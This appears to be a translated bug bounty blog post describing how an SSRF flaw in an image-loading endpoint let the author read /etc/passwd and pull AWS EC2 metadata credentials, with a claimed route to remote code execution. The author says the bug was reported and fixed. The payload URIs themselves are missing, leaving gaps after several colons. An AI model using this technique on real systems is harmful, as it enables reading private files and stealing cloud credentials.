how attackers exploit ssrf vulnerability to read local files and abuse aws metadata

Posted by barello at 2020-04-17

Vulnerability introduction

In fact, this endpoint is used to load the images that I have long transferred to the website, and my images are stored in the AWS bucket. Obviously, since it's going to load content, why not load content from other domains? How about trying RFI?

Here are my specific steps:

Try XSS (unfortunately failed)

Attempt to read local file (successful)

Then a text file is downloaded:

When I check the downloaded text file, I'm surprised by the content: This is clearly the content of the etc / passwd file.

Now, since it is found that the website will load images from AWS, why not try to extract the internal AWS metadata?

Read AWS EC2 metadata

In order to modify the URL parameter, you need to view the instance metadata of all categories in the current running instance. To do this, you can use the following URI:

In this way, we can read the secret access key, token and other confidential information. After exporting the information, you can access it through AWS client This, you know.

In short, with the security permission here, we can implement rce through SSRF vulnerability.

In addition, I have submitted the vulnerability to the relevant departments, and now it has been fixed. At the same time, I also received a 4-digit bonus. I hope this article can help you!